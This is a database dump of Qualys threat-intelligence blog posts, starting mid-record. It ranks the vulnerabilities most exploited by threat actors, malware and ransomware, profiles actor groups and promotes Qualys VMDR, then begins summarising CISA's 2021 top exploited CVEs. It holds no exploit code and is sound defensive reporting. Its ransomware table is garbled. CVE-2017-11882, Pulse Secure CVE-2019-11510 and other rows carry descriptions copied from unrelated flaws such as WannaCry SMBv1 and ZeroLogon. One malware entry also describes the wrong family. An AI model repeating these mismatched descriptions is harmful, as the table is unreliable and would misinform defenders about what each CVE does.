"1337DAY-ID-23443", "1337DAY-ID-24039", "1337DAY-ID-24647", "1337DAY-ID-25423", "1337DAY-ID-25954", "1337DAY-ID-26550", "1337DAY-ID-27390", "1337DAY-ID-27607", "1337DAY-ID-27613", "1337DAY-ID-27617", "1337DAY-ID-27662", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-27803", "1337DAY-ID-28706", "1337DAY-ID-28811", "1337DAY-ID-29022", "1337DAY-ID-29119", "1337DAY-ID-29702", "1337DAY-ID-29976", "1337DAY-ID-30434", "1337DAY-ID-31147", "1337DAY-ID-31749", "1337DAY-ID-32626", "1337DAY-ID-32663", "1337DAY-ID-33133", "1337DAY-ID-33134", "1337DAY-ID-33140", "1337DAY-ID-33313", "1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824", "1337DAY-ID-33895", "1337DAY-ID-35274", "1337DAY-ID-35944", "1337DAY-ID-36024", "1337DAY-ID-36262", "1337DAY-ID-36281", "1337DAY-ID-36667", "1337DAY-ID-36694", "1337DAY-ID-36730", "1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37228", "1337DAY-ID-37257", "1337DAY-ID-37264", "1337DAY-ID-37781", "1337DAY-ID-37889", "1337DAY-ID-38098", "1337DAY-ID-38421"]}]}, "score": {"value": 10.8, "vector": "NONE"}, "vulnersScore": 10.8}, "_state": {"dependencies": 1696352655, "score": 1698858709}, "_internal": {"score_hash": "fb578904517f7c1f00062a74e891d8e1"}}

{"qualysblog": [{"lastseen": "2023-08-08T15:22:18", "description": "The [previous blog](<https://blog.qualys.com/product-tech/2023/07/11/an-in-depth-look-at-the-latest-vulnerability-threat-landscape-part-1>) from this three-part series showcased an overview of the vulnerability threat landscape. To summarize quickly, it illustrated the popular methods of exploiting vulnerabilities and the tactical techniques employed by threat actors, malware, and ransomware groups. Perhaps more crucially, we stated that commonly used solutions (CISA KEV/EPSS) often fall short in identifying high-risk vulnerabilities. \n\nIn this blog, we will focus on an **insider&#x27;s perspective on the threat landscape**, viewing it through the eyes of an attacker. We will examine how quickly vulnerabilities get exploited in the wild, identify popularly sought-after vulnerabilities by threat actors, malware, and ransomware groups, and explore their underlying motives. \n\nWe will also provide insights on what measures to take you can take to safeguard your organizations from these vulnerabilities. \n\nSo, let&#x27;s dive headfirst into this intriguing world without further ado. \n\n### How Fast Are Vulnerabilities Getting Exploited (Time to CISA KEV)?\n\nWe&#x27;ve already highlighted one of the most noteworthy efforts by the team at CISA - the creation of the known exploited vulnerabilities catalog in our previous blog. Initiated as part of [Binding Operational Directive 22-01 in 2021](<https://www.cisa.gov/news-events/directives/binding-operational-directive-22-01>), this project was born out of the need to minimize risks associated with these vulnerabilities. In its early years, there was a substantial backlog to address. Still, by 2023, the CISA team has had their operation running like a well-oiled machine and is swiftly updating the catalog with newly exploited vulnerabilities as soon as evidence emerges. \n\nSo, let&#x27;s dive deep into understanding how quickly the vulnerabilities get exploited in the wild, as disclosed by the National Vulnerability Database(NVD).\n\nThe following graph illustrates the average duration it takes to include a vulnerability in the Known Exploited Vulnerabilities (KEV) catalog from when it was published in NVD.\n\nFor those CVEs disclosed in 2023, the gap to **time to KEV was just eight days**.\n\nFig 1. Average Time in Days to CISA KEV Catalog\n\nDefenders, therefore, have limited time to respond to vulnerabilities. The only viable response is through automation to patch these vulnerabilities before attackers can exploit them. Note that the average timeframe mentioned here, as in some instances, vulnerabilities are exploited almost instantly.\n\n### Which Vulnerabilities Are Exploited and by Whom?\n\nSo which vulnerabilities are exploited in the wild? And who is exploiting them? Are there any specific vulnerabilities that are more sought-after than others? If so, which ones?\n\nTo understand these questions, let&#x27;s examine three main groups of attackers.\n\n * Threat Actor groups\n * Malwares\n * Ransomware groups\n\nAlthough there is some overlap within each group, it appears to favor a slightly different set of vulnerabilities depending on the use case.\n\n## Top Ten Vulnerabilities Exploited by Threat Actors\n\nHere\u2019s a list of the top ten vulnerabilities exploited by threat actors.\n\nThe chart below shows **the number of threat actors known to exploit a given vulnerability**.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-2-Top-10-Vulnerabilities-Exploited-by-Threat-Actors.png>)Fig 2. Top Ten Vulnerabilities Exploited by Threat Actors for High-Risk Vulnerabilities\n\n**Title** | **CVE**s | **Threat Actor Count** | **TruRisk Score** **(QVS)** | **Description** \n---|---|---|---|--- \nMicrosoft Office/WordPad Remote Code Execution Vulnerability | CVE-2017-0199 | 53 | 100 | Allows a malicious actor to download Visual Basic script containing PowerShell commands. Works reliably well across a wide attack surface. Popular with [APT Groups](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>). \nMicrosoft Office Equation Editor Remote Code Execution Vulnerability | CVE-2017-11882 | 52 | 100 | Exploits Office&#x27;s default Equation Editor feature by tricking the user to open a malicious file. This one is the hacking group\u2019s most favorite vulnerability, especially groups such as Cobalt or other malware as you will see in the next section. \nWindows Common Controls Remote Code Execution Vulnerability | CVE-2012-0158 | 45 | 100 | Executes remote code by tricking the user to click on a malicious link or specially crafted malicious file. \nApache Log4j RCE (Log4Shell) | CVE-2021-44228 | 26 | 100 | [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>). Do we need to say anything more? \nMicrosoft Office Memory Corruption Vulnerability | CVE-2018-0802 | 24 | 100 | Executes remote code by tricking the user to open a specially crafted malicious file in Office or WordPad. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon) | CVE-2021-26855 | 22 | 100 | Allows an unauthenticated user to run arbitrary commands on the exchange server in its default configuration. Heavily exploited by the [Hafnium](<https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) group among others. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34473 | 20 | 100 | Allows an unauthenticated user to run arbitrary commands on the exchange server. Can be clubbed with other CVE\u2019s CVE-2021-34523 and CVE-2021-31207 making it more attractive to cybercriminals. \nArbitrary file write vulnerability in Exchange | CVE-2021-27065 | 19 | 95 | Requires authentication that can then write arbitrary file write vulnerability in Exchange. Leveraged as part of the attack chain once an attacker has initial access. Exploited by Hafnium group among others. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34523 | 17 | 100 | Allows an unauthenticated user to run arbitrary commands on the exchange server. Can be chained with other CVE\u2019s CVE-2021-34473 and CVE-2021-31207 making it more attractive to cybercriminals. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-31207 | 17 | 95 | Allows an unauthenticated user to run arbitrary commands on the exchange server. Can be chained with other CVE\u2019s CVE-2021-34473 and CVE-2021-31207 making it more attractive to cybercriminals. \n \nTable 1. Top 10 Vulnerabilities Exploited by Threat Actors for High-Risk Vulnerabilities\n\n## Top Ten Highly Active Threat Actors\n\nNext, let\u2019s talk about some of the most active threat actors known to leverage the maximum number of vulnerabilities as part of their arsenal capable of compromising systems across the globe.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-3-Most-Active-Threat-Actors.png>)Fig 3. Most Active Threat Actors for High-Risk Vulnerabilities\n\n**Threat Actor ** | **CVEs Exploited ** | **Description ** \n---|---|--- \nEquation Group** ** | 51 | Uses a variety of malware, including backdoors, trojans, and rootkits, often targeting zero-day vulnerabilities. Such kinds of malware are often challenging to detect and remove. \nFancy Bear** ** | 44 | Best known as APT28 or Sofacy, it uses advanced malware and spear-phishing tactics. The group is also known for using \u201cwatering hole\u201d attacks. In 2016, APT28 reportedly attempted to interfere with the U.S. presidential elections. \nWicked Panda** ** | 30 | Also known by Axiom, Winnti, APT41, or Bronze Atlas. This group conducts financially motivated operations. It&#x27;s been observed to target healthcare, telecom, technology, and video game industries in 14 countries. \nRicochet Chollima** ** | 26 | Also known as APT37, Reaper, and ScarCruft, they primarily target financial institutions, academics, and journalists. \nLabyrinth Chollima** ** | 24 | This is a sub-group of the Lazarus Group that has been attributed to the Reconnaissance General Bureau. It was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a known campaign called The Operation Blockbuster campaign by Novetta. \nStardust Chollima** ** | 22 | Also known as BlueNoroff, it is a sub-group of the Lazarus Group and has been attributed to the Reconnaissance General Bureau, target banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. \nCarbon Spider** ** | 22 | Also known as Carbanak, FIN7, and Anunak, this threat actor is a financially motivated threat group that targets the U.S. retail, restaurant, and hospitality sectors, often using point-of-sale malware. \nCozy Bear** ** | 20 | Also known as APT29, often targets government networks in Europe and NATO member countries, research institutes, and think tanks. \nAPT37** ** | 20 | It is also linked to the following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are You Happy? FreeMilk, North Korean Human Rights, and Evil New Year 2018. \n | | \n \nTable 2. Most Active Threat Actors for High-Risk Vulnerabilities \n\n## Top Ten Most Exploited Vulnerabilities by Malware\n\nNow, let\u2019s check some of the commonly exploited vulnerabilities by malware.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-4-Top-10-Vulnerabilities-Exploited-by-Malwares.png>)Fig 4. Top Ten Vulnerabilities Exploited by Malware for High-Risk Vulnerabilities\n\nTitle | CVEs | Malware Count | TruRisk Score (QVS) | Description \n---|---|---|---|--- \nMicrosoft Office Equation Editor Remote Code Execution Vulnerability | CVE-2017-11882 | 467 | 100 | The absolute granddaddy of all CVEs most exploited by malware. \nIn the history of CVEs, this would be the most beloved malware CVE of all time. \nMicrosoft Office/WordPad Remote Code Execution Vulnerability | CVE-2017-0199 | 92 | 100 | [Allows a malicious actor to download Visual Basic script containing PowerShell commands. Works reliably well across a wide attack surface. Popular with APT Groups.](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) \nJava Applet Field Bytecode Verifier Cache RCE | CVE-2012-1723 | 91 | 100 | Exploits the vulnerability in JRE to download and install files of an attacker\u2019s choice onto the system. \nMicrosoft Office Remote Code Execution Vulnerability | CVE-2017-8570 | 52 | 100 | [Executes remote code by tricking the user to open a malicious RTF file. Bypasses the patch from CVE-2017-0199. Known to be used in malware spam campaigns.](<https://www.zscaler.com/blogs/security-research/cve-2017-8570-and-cve-2018-0802-exploits-being-used-spread-lokibot>) \nWindows Graphics Device Interface (GDI) RCE | CVE-2019-0903 | 30 | 93 | Exploits vulnerability in the Graphics Component which is fundamental part of the Windows OS used for rendering graphics. \nMicrosoft Office Memory Corruption Vulnerability | CVE-2018-0802 | 29 | 100 | Exploits a vulnerability that was not patched by CVE-2017-11882. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon) | CVE-2021-26855 | 19 | 100 | [Allows an unauthenticated user to run arbitrary commands on the exchange server in its default configuration. Heavily exploited by Hafnium group among others.](<https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) \nMicrosoft Windows Netlogon Privilege Escalation (ZeroLogon) | CVE-2020-1472 | 17 | 100 | Allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. \nLets the attacker instantly become an admin on enterprise networks. \nMicrosoft Windows CryptoAPI Spoofing Vulnerability | CVE-2020-0601 | 17 | 95 | Enables attackers to execute spoofing attacks, masquerading malicious programs as legitimate software, apparently authenticated with a genuine digital signature. \nThis essentially allows for the delivery of malware under the guise of legitimate software. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34473 | 12 | 100 | Allows an unauthenticated user to run arbitrary commands on the exchange server. \nIt can be chained with other CVE\u2019s CVE-2021-34523 and CVE-2021-31207 making it more attractive to cybercriminals. \n \nTable 3. Top Ten Vulnerabilities Exploited by Malware for High-Risk Vulnerabilities\n\n## Top Ten Most Active Malware\n\nAnd here\u2019s a list of the ten most common malware names that are known to exploit vulnerabilities that compromise systems.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-5-Most-Active-Malwares.png>)Fig 5. Most Active Malware for High-Risk Vulnerabilities\n\nMalware | CVEs Count | Description \n---|---|--- \nHeuristic | 117 | Heuristic viruses can refer to malware detected by heuristic analysis or the virus Heur. The Invader, which compromises a device\u2019s security and antivirus measures. Some examples of heuristic viruses include adware and Trojans. \nWacatac | 94 | Also known as Trojan: Win32/Wacatac.B, is a trojan horse that is designed to steal personal information, such as passwords, credit card numbers, and other sensitive data. \nPidief | 73 | Pidief malware is a file infector, that can infect executable files, such as .exe files, it will modify the file to execute the Pidief malware. \nSkeeyah | 52 | Skeeyah malware is a file infector that can infect executable files, such as .exe files. It will modify the file in a way that will execute the Skeeyah malware when the file is opened. \nBitrep | 49 | Trojan horse virus that infiltrates a computer via a vulnerability in Adobe Flash. Swifi is downloaded from a malicious website without user knowledge or consent and may cause performance degradation, and security malfunctions leading to unauthorized users gaining remote access \nMeterpreter | 46 | Meterpreter is a malicious trojan-type program that allows cyber criminals to remotely control infected computers, without writing anything to disk. This malware can log keystrokes - recording keyboard input (keys pressed) to steal credentials (logins, passwords) linked with various accounts and personal information. \nSwifi | 42 | Trojan horse virus that infiltrates a computer via a vulnerability in Adobe Flash. Swifi is downloaded from a malicious website without user knowledge or consent, and may cause performance degradation, and security malfunctions leading to unauthorized users gaining remote access \nIFrame | 38 | The iframes are used to inject malicious content into a website and can be spread through malicious websites that contain iframes with malicious content. \nLotoor | 35 | It can infect Android devices, often spread through malicious apps available on third-party app stores. These apps may appear to be legitimate, but they actually contain the Lotoor malware. \nRedirector | 34 | Redirects users to malicious websites without their knowledge or consent. This type of malware can be very dangerous, leading users to download other malicious software or enter personal information. \n \nTable 4. Most Active Malware for High-Risk Vulnerabilities\n\n## Top Ten Vulnerabilities Exploited by Ransomware\n\nLastly, let&#x27;s examine the vulnerabilities that ransomware tends to exploit. **Ransomware is a particular type of malware that encrypts data on storage systems, rendering them inaccessible unless the victim pays a ransom, typically in Bitcoin.** Since the notorious WannaCry crypto-ransomware incident in May 2017, the use of such malicious software has notably escalated.\n\nThe latest report on such escalating threat involves a data breach during a MOVEit transfer, for which the BlackCat ransomware gang claimed responsibility. This same group alleges to be behind the data theft attack on Reddit.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-6-Top-10-Vulnerabilities-Exploited-by-Ransomware.png>)Fig 6. Top Ten Vulnerabilities Exploited by Ransomware for High-Risk Vulnerabilities\n\n**Title** | **CVEs** | **Ransomware Count** | **TruRisk** **Score (QVS)** | **Description** \n---|---|---|---|--- \nMicrosoft Office Equation Editor Remote Code Execution Vulnerability | CVE-2017-11882 | 14 | 100 | Allows an unauthenticated attacker to exploit the vulnerability in SMBv1 to completely compromise systems. It was used by the [WannaCry crypto worm](<https://en.wikipedia.org/wiki/WannaCry_ransomware_attack>) as part of a worldwide cyberattack. \nJava AtomicReferenceArray deserialization RCE | CVE-2012-0507 | 42 | 100 | Exploits the vulnerability in JRE to download and install files of an attacker\u2019s choice onto the system by tricking the user to visit a malicious link. Old CVE, but still relevant. \nJava Applet Field Bytecode Verifier Cache RCE | CVE-2012-1723 | 13 | 100 | Exploits the vulnerability in JRE to download and install files of an attacker\u2019s choice onto the system. \nWindows SMB v1 Remote Code Execution (WannaCry) | CVE-2017-0145 | 13 | 100 | Allows an unauthenticated, remote attacker to read arbitrary files allowing the attacker to access private keys or user/password information, which is then used to gain further unauthorized access. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34473 | 12 | 100 | Allows an unauthenticated user to run arbitrary commands on the exchange server. It Can be chained with other CVE\u2019s CVE-2021-34523 and CVE-2021-31207 making it more attractive to cybercriminals. \nPulse Connect Secure SSL VPN Vulnerability | CVE-2019-11510 | 12 | 100 | Allows an unauthenticated attacker to exploit the vulnerability in SMBv1 that completely compromises systems. It was leveraged by the WannaCry crypto worm as part of a worldwide cyberattack. \nWindows SMB v1 Remote Code Execution (WannaCry) | CVE-2017-0144 | 12 | 95 | Allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It lets the attacker instantly become an admin on enterprise networks. \nMicrosoft Windows Netlogon Privilege Escalation (ZeroLogon) | CVE-2020-1472 | 11 | 93 | Allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It lets the attacker instantly become an admin on enterprise networks. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34523 | 10 | 100 | Allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. \nIt lets the attacker instantly become an admin on enterprise networks. \nCitrix Application Delivery Controller/NetScaler RCE | CVE-2019-19781 | 10 | 100 | Allows an unauthenticated attacker to execute arbitrary code on the system. Was leveraged to drop NOTROBIN malware to maintain persistent access. \n \nTable 5. Top 10 Vulnerabilities Exploited by Ransomware for High-Risk Vulnerabilities\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-7-Most-Active-Ransomwares.png>)Fig 7. Most Active Ransomware for High-Risk Vulnerabilities\n\n**Ransomware** | **CVEs** **Count** | **Description** \n---|---|--- \n**Conti** | 30 | &quot;Conti&quot; is a Ransomware-as-a-Service (RaaS) targeting corporations and agencies by stealing and threatening to publish their sensitive data unless a ransom is paid. It uses unique encryption keys for each file and victim and leverages the Windows Restart Manager to unlock files for encryption. \n**Cerber** | 30 | This modular ransomware can spread through email attachments, exploit kits, and drive-by downloads. It encrypts files and demands a ransom payment in Bitcoin. \n**REvil** | 25 | This modular ransomware can spread through email attachments, exploit kits, and drive-by downloads. It encrypts files and demands a ransom payment in Bitcoin. \n**Sodinokibi** | 21 | A successor to REvil that is even more sophisticated. It can encrypt files on all types of devices, including servers, laptops, and mobile phones. \n**Lucky** | 21 | This ransomware is known for its aggressive spam campaigns. It sends emails with malicious attachments that, when opened, infect the victim&#x27;s computer with ransomware. \n**GandCrab** | 19 | This ransomware is known for its high ransom demands. It has targeted businesses in various industries, including healthcare, finance, and manufacturing. \n**Ryuk** | 17 | This ransomware is known for its high ransom demands. It has targeted businesses in various industries, including healthcare, finance, and manufacturing. \n**Reveton** | 16 | Known for its scareware tactics, this ransomware displays a fake warning message claiming the victim&#x27;s computer has been infected with malware. The message demands that the victim pay a ransom to remove the malware. \n**STOP** | 15 | Ransomware operators are known to be aggressive and persistent, often threatening to release stolen data or to attack systems again if the ransom is not paid. \n**Satan** | 15 | Satan ransomware can be very high, and there is no guarantee that victims will get their data back even if they pay the ransom. Used in attacks against high-profile organizations, healthcare, education, government, and businesses of all sizes. \n \nTable 6. Most Active Ransomware for High-Risk Vulnerabilities\n\n## Prioritizing Exploited Vulnerabilities with The Qualys VMDR and TruRisk\n\nOftentimes, malicious actors frequently target diverse sets of vulnerabilities to accomplish their objectives. As such, keeping track of who is exploiting what can be daunting, and it&#x27;s certainly not an efficient use of the time for practitioners or security &amp; risk management leaders.\n\nHence, **The Qualys VMDR with TruRisk** facilitates this process, substantially simplifying the prioritization process by translating the risk associated with vulnerabilities, assets, and asset groups into an easily understandable score that both technical and non-technical teams can comprehend this scoring system.\n\nWhen you carefully observe, each vulnerability mentioned above has a TruRisk Score (QVS) of over 90. TruRisk considers these factors daily, consistently assigning a score higher than 90.\n\nSo, from a prioritization standpoint, any issue with a score of 90 or above should be immediately prioritized and remedied.\n\nLet\u2019s take CVE-2017-11882 as an example. The TruRisk score clearly indicates why this is a high-risk vulnerability, with more than 400 malware and 50 threat actors exploiting it, and **we see evidence of exploitation as recently as July 16th, 2023, for a 6-year-old vulnerability. **\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-8-Microsoft-Office-Memory-Corruption-Vulnerability_-CVE-2017-11882.jpg>)\n\nFig 8. Microsoft Office Memory Corruption Vulnerability: CVE-2017-11882\n\n## Assess Your Organizations Exposure to Risk / TruRisk Dashboard\n\nThe Qualys VMDR helps organizations get instant visibility into high-risk vulnerabilities, especially those exploited in the wild.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-9-1.jpg>)\n\nFig 9. Qualys VMDR TruRisk Dashboard for High-Risk Vulnerabilities\n\nThe fastest method to gain insights into your TruRisk is by downloading and importing the TruRisk Dashboard into your VMDR subscription.\n\nThe TruRisk VMDR Dashboard is available \u2013 [Download the Dashboard Here](<https://blog.qualys.com/wp-content/uploads/2023/07/Qualys_VMDR_TruRisk__UDDashboard.zip>)\n\nAnd once you have the visibility patch with Qualys Patch management instantly reduce the risk.\n\n## Key Insights &amp; Takeaways\n\n * The time to Known Exploited Vulnerability (KEV) is down to eight days for CVEs published in 2023. Defenders should leverage automation to patch high-risk vulnerabilities.\n * CVE-2017-11882 stands out as the pinnacle among CVEs in its exploitation by malware, threat actors, and ransomware groups. With over 400 malware, 50 threat actors, and 14 ransomware groups taking advantage of this vulnerability, it will likely be remembered as the most cherished attacker CVE ever.\n * Attackers prominently exploit vulnerabilities in popular applications such as Microsoft Office, Microsoft Exchange, Windows Operating systems, Java, Pulse Secure SSL VPN, and Citrix ADC/NetScaler. Attackers seek these applications** primarily due to their widespread usage and potential for exploiting security weaknesses.**\n * Organizations should leverage threat intelligence to prioritize vulnerabilities that reduce the risk of exploitation.\n * The Qualys VMDR with TruRisk automatically prioritizes vulnerabilities exploited in the wild with a **TruRisk score of 90 or higher,** greatly simplifying the prioritization process.\n\nConcluding this series in the next blog we will discuss the _**15 most exploited vulnerabilitie**_**_s ever_**.\n\nWatch out for our next blog.\n\n## References\n\n * <https://blog.qualys.com/product-tech/2023/07/11/an-in-depth-look-at-the-latest-vulnerability-threat-landscape-part-1>\n * <https://blog.qualys.com/qualys-insights/2022/10/10/in-depth-look-into-data-driven-science-behind-qualys-trurisk>\n * <https://blog.qualys.com/vulnerabilities-threat-research/2022/12/16/implement-risk-based-vulnerability-management-with-qualys-trurisk-part-2>\n * <https://blog.qualys.com/qualys-insights/2022/08/08/a-deep-dive-into-vmdr-2-0-with-qualys-trurisk>\n\n## Additional Contributor\n\nShreya Salvi, Data Scientist, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-07-18T13:38:53", "type": "qualysblog", "title": "Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers\u2019 Edition)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2012-0507", "CVE-2012-1723", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2019-0903", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0601", "CVE-2020-1472", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-44228"], "modified": "2023-07-18T13:38:53", "id": "QUALYSBLOG:1D4C1F32168D08F694C602531AEBC9D9", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-11T05:29:14", "description": "_The U.S. Cybersecurity &amp; Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report\u2019s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment._\n\nThe Cybersecurity &amp; Infrastructure Security Agency (CISA) releases [detailed alerts](<https://www.cisa.gov/uscert/ncas/alerts>) of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights into the type, nature, and vendor product affected, as well as recommended mitigations that enterprise IT/security professionals can take to reduce their risk.\n\nTo that end, CISA has released its [2021 Top Routinely Exploited Vulnerabilities Report](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>). It provides in-depth details of each exploited CVE, including which threat actors aggressively targeted both public and private sector organizations worldwide. It also provides mitigation guidance for all the top vulnerabilities.\n\nOf special interest in the report is this key finding by CISA:\n\n_Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability&#x27;s disclosure, likely facilitating exploitation by a broader range of malicious actors._\n\n### CISA\u2019s Top 15 Routinely Exploited Vulnerabilities of 2021\n\nThe top 15 routine vulnerability exploits observed by cybersecurity authorities in the U.S., Australia, Canada, New Zealand, and the U.K. are:\n\nCVE| Vulnerability Name| Vendor and Product| Type \n---|---|---|--- \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)| [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>) | Apache Log4j| Remote code execution (RCE) \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)| | Zoho ManageEngine AD SelfService Plus| RCE \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)| ProxyShell| Microsoft Exchange Server| Elevation of privilege \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)| ProxyShell| Microsoft Exchange Server| RCE \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)| ProxyShell| Microsoft Exchange Server| Security feature bypass \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)| | Atlassian Confluence Server and Data Center| Arbitrary code execution \n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)| | VMware vSphere Client| RCE \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)| [ZeroLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2020/09/15/microsoft-netlogon-vulnerability-cve-2020-1472-zerologon-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Netlogon Remote Protocol (MS-NRPC)| Elevation of privilege \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)| | Microsoft Exchange Server| RCE \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)| | Pulse Secure Pulse Connect Secure| Arbitrary file reading \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)| | Fortinet FortiOS and FortiProxy| Path traversal \n \n### Highlights of Top Vulnerabilities Cited in CISA 2021 Report\n\nBased on the analysis of this report by the Qualys Research Team, let\u2019s review a few of the top vulnerabilities on the 2021 list and our recommendations for how Qualys enterprise customers can detect and respond to them.\n\n#### Log4Shell Vulnerability\n\nThe Log4Shell vulnerability **(CVE-2021-44228)** was disclosed in December 2021. It was widely exploited by sending a specially crafted code string, which allowed an attacker to execute arbitrary Java code on the server and take complete control of the system. Thousands of products used Log4Shell and were vulnerable to the Log4Shell exploitation.\n\nVisit the [Qualys Log4Shell website](<https://www.qualys.com/log4shell-cve-2021-44228/>) for full details on our response to this threat.\n\n### ProxyShell: Multiple Vulnerabilities\n\nThe multiple vulnerabilities called ProxyShell **(CVE-2021-34523, CVE-2021-34473, CVE-2021-31207)** affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., via &quot;vulnerability chaining&quot;) enables a remote actor to execute arbitrary code and privilege escalation.\n\n### ProxyLogon: Multiple Vulnerabilities\n\nThe multiple vulnerabilities named ProxyLogon **(CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065)** also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination allows an unauthenticated threat actor to execute arbitrary code on vulnerable Exchange Servers, which enables the attacker to gain persistent access to files, mailboxes, and credentials stored on the servers.\n\n[Read our 